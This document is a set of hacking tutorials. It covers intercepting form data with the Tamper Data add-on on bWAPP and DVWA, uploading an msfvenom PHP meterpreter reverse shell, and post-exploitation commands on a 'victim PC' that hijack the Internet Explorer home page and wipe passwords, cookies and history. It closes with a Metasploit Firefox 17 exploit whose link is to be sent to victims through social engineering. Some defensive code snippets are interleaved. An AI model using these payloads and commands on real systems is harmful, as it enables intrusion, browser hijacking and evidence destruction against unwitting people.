Web Penetration Testing with Tamper Data (Firefox Add-on)

Tampering means modifying request parameters before the request is submitted. It can be done in various ways, one of which is Tamper Data, a widely used Firefox extension. It lets you modify the data sent between the client and the server and gives easy access to the data of GET and POST elements.

Installing Tamper Data Add-On

Select the menu at the right end of the Firefox window and click on Add-ons.

In the search field, search for the Tamper Data add-on and click on Install. After installing the add-on, restart the Firefox browser.

Displaying clear text password in Facebook using Tamper Data

I am logging in to my Facebook account, and the password I type is shown in dotted form, so I want to know whether the password I typed is correct. Click Tools in the menu bar and select Tamper Data to capture the request.

A Tamper Data pop-up opens; click Start Tamper to begin capturing requests. The username and password typed into the fields are sent with the POST method, so now click the Login button to send the data.

When the browser sends the request to the web server, a pop-up appears; click Tamper to intercept the outgoing request.

In the right half of the Tamper Popup window, the email and pass values are shown in clear text. Tamper Data runs inside the browser, so it sees the form values before the request is encrypted for transport.

HTML Injection – Reflection POST method with Tamper Data

I have installed bWAPP on my WAMP server running on localhost. It can be accessed through the browser. Navigate to the login page using the URL “localhost/bWAPP/login.php”.

Log in to the web application with bee:bug as the login credentials, choose the bug “HTML Injection - Reflected (POST)” from the list of bugs, and click Hack.

In the text fields, enter first name: kunal and last name: bhal.

Before clicking Go, start Tamper Data again so that the field values can be changed. We can then see the POST values and modify them to change the submitted user name.

Now click Go; a dialog box opens. Click Tamper to capture the request.

The captured request shows the first and last name kunal: bhal.

Tamper Data lets you modify a request after the form has been submitted and before it reaches the server, so I change the first name to first and the last name to last, then click OK to forward the request.

The request has now been forwarded to the web server.

We successfully changed the user name; the page now shows it as “first last”. Similarly, you can use Tamper Data against other bWAPP modules.
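The reflected page has to treat whatever arrives in the POST body as untrusted, because the values can be edited after the form is submitted. The following is an added example, not bWAPP's code or the author's; the field names firstname and lastname and both sample bodies are assumptions constructed for illustration. It renders a tampered body with and without output encoding:

```python
import html
from urllib.parse import parse_qs

def parse_form(body):
    """Decode an application/x-www-form-urlencoded body as the server receives it."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def render_unsafe(form):
    # Flawed pattern: request values concatenated straight into the markup.
    return "<p>Welcome {} {}</p>".format(
        form.get("firstname", ""), form.get("lastname", ""))

def render_safe(form):
    # Encode at the output boundary; quote=True also covers attribute contexts.
    first = html.escape(form.get("firstname", ""), quote=True)
    last = html.escape(form.get("lastname", ""), quote=True)
    return "<p>Welcome {} {}</p>".format(first, last)

# Constructed sample bodies (assumed field names): what the form submitted,
# and the same request after its values were edited in transit.
ORIGINAL = "firstname=kunal&lastname=bhal"
TAMPERED = "firstname=first&lastname=%3Ch1%3Elast%3C%2Fh1%3E"

if __name__ == "__main__":
    for body in (ORIGINAL, TAMPERED):
        form = parse_form(body)
        print("unsafe:", render_unsafe(form))
        print("safe:  ", render_safe(form))
```

With encoding applied, the edited value is displayed as text instead of being interpreted as markup, whatever the client sent.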

File upload using tamper data

Now open DVWA in your browser at your local IP, here 192.168.1.102:81/DVWA, and log in with the following credentials:

Username – admin

Password – password

Click on DVWA Security, set the security level to medium, then select the File Upload vulnerability.

Open a terminal in Kali Linux and create a PHP backdoor with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw

Copy the generated code, paste it into Leafpad, and save it on the desktop as hacked.php.png.

Load the Metasploit Framework by typing msfconsole and start the multi handler.

Now click the Browse button and select the hacked.php.png file for upload.

Click Tools in the menu bar and select Tamper Data to capture the request.

Before clicking Upload, start Tamper Data again, then click Upload. When the browser sends the request to the web server, a pop-up appears; click Tamper to intercept the outgoing request.

Tamper Data has captured the POST request. Copy the selected data from the POST DATA field.

Paste the POST DATA into a text file so that the extension of the upload can be changed. The file name is hacked.php.png, but we want to upload a PHP file.

In the pasted POST DATA, change hacked.php.png to hacked.php, then select and copy the complete data.

Now paste the whole contents of the text file into the POST DATA field and click OK.

The modified request has now been forwarded; click Stop Tamper.

The PHP file has been uploaded to the uploads directory. Copy the path /hackable/uploads/hacked.php where the file was uploaded and open the following URL to execute it:

http://192.168.1.102:81/DVWA/hackable/uploads/hacked.php

You will get a reverse connection from the victim in Metasploit.

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

meterpreter > sysinfo

I have got a meterpreter session on the victim PC.
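The upload walkthrough above works because the filename, like the declared content type, is read from a request that can be edited after the file is chosen. The following server-side check is an added example, not DVWA's code or the author's; the function name, the allowlist and the sample bytes are assumptions constructed for illustration.

```python
import os
import secrets

# Allowlist: extension -> magic bytes the file content must start with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

def validate_upload(filename, declared_type, content):
    """Return (accepted, reason, stored_name) for one uploaded file part.

    declared_type is deliberately ignored: like the filename, it is taken
    from the request and can be edited before the server sees it.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base:
        return False, "NUL byte in filename", None
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed: " + (ext or "(none)"), None
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match " + ext, None
    # Never write the client-chosen name to disk; generate one server-side.
    return True, "ok", secrets.token_hex(16) + ext

# Constructed sample inputs (placeholder bytes, not a real payload or image).
SCRIPT = b"<?php /* placeholder */ ?>"
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    cases = [
        ("hacked.php", "image/png", SCRIPT),      # filename edited in transit
        ("hacked.php.png", "image/png", SCRIPT),  # as selected in the browser
        ("photo.png", "image/png", PNG),
    ]
    for name, ctype, data in cases:
        print(name, validate_upload(name, ctype, data))
```

Both forms of the file from the walkthrough are rejected, and an accepted image is stored under a generated name. Keeping the upload directory somewhere the web server does not execute scripts is a further layer.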

Author: Kunal Bahl is a skilled computer enthusiast and an ethical hacker. He has a great interest in gadgets and is currently pursuing a Bachelor’s in Electronics and Communication Engineering.

Hack Internet Explorer on a Remote PC: Set Your Desired Home Page

First, hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC).

Once you have the meterpreter session, use the ‘shell’ command to get a command prompt on the target.

Set Your Desired Website as Home Page

Type the following command in the command prompt. (Enter the web address of the desired website; here we use http://www.hackingarticles.in/ as an example.)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.hackingarticles.in/" /F

Now, when Internet Explorer is opened on the remote victim PC, the chosen web page opens as the home page.

Stylish Home Page

(Use this link www.shinysearch.com to put your own desired text.)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.shinysearch.com/myhome.php?theme=matrix&ltext=www.hackingarticles.in" /F

Check out this screenshot, seen after opening Internet Explorer.

Insert Your Image in Google Background

Type the following command.

(Take the reference of the link http://www.hackingarticles.in/insert-image-google-search/ to put your own desired image in the background.)

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.shinysearch.com/myhome.php?style=mypic_full&img=b26b7e0e353d82b7642905e68ca5476e&ltext=Your%20Name" /F

Open Internet Explorer; the image appears in the Google search background.

How to Delete Passwords/Cookies/History/Temp Internet Files of Internet Explorer in Remote Victim PC

First, hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC).

Once you have the meterpreter session, use the ‘shell’ command to get a command prompt on the target.

Delete Temporary Internet Files

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8

Delete Cookies

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2

Delete History

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1

Delete Form Data

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16

Delete Passwords

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32

Delete All

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255

Delete All + files and settings stored by Add-ons

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351
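Both the Start Page change in the previous section and the ClearMyTracksByProcess calls above leave a distinctive command line in process-creation logs (for example Windows Security event 4688 with command-line auditing, or Sysmon event 1). The following detection logic is an added example, not from the original post; the function names, the example.test URL and the sample log lines are constructed, and the 4096 bit is inferred from the page's 4351 and 255 values.

```python
import re

# Flag values listed on this page; any other set bit is reported as unlisted.
# 4096 is inferred: the page's 4351 ("all + add-on data") minus 255 ("all").
FLAGS = {1: "history", 2: "cookies", 8: "temporary internet files",
         16: "form data", 32: "passwords", 4096: "add-on files and settings"}

CLEAR_RE = re.compile(r'inetcpl\.cpl\s*,\s*ClearMyTracksByProcess\s+(\d+)', re.I)
START_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+add\s+.*Internet Explorer\\Main'
    r'.*?/v\s+"?Start Page"?.*?/d\s+"?([^"\s]+)', re.I)

def decode_flags(value):
    """Split a ClearMyTracksByProcess argument into named categories."""
    names, bit = [], 1
    while bit <= value:
        if value & bit:
            names.append(FLAGS.get(bit, "unlisted bit %d" % bit))
        bit <<= 1
    return names

def inspect_cmdline(cmdline):
    """Return a list of (finding, detail) tuples for one process command line."""
    findings = []
    m = CLEAR_RE.search(cmdline)
    if m:
        findings.append(("ie_data_cleared", decode_flags(int(m.group(1)))))
    m = START_RE.search(cmdline)
    if m:
        findings.append(("ie_start_page_set", m.group(1)))
    return findings

# Constructed sample command lines, as a process-creation log would record them.
SAMPLES = [
    r'RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351',
    r'REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://example.test/" /F',
    r'rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl',  # no clear action
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect_cmdline(line))
```

Users can trigger the same clearing from Internet Explorer's own settings, so the parent process and logon session of a match are what separate routine use from cleanup after a compromise.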

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Exploit Targets

Firefox 17.0.1

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open a BackTrack terminal and type msfconsole

Now type use exploit/multi/browser/firefox_svg_plugin

msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)

msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)

msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)

msf exploit (firefox_svg_plugin)>exploit

Now the URL you should give to your victim is http://192.168.1.167:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions, then type “sessions -i ID” with the session number to connect to the session.
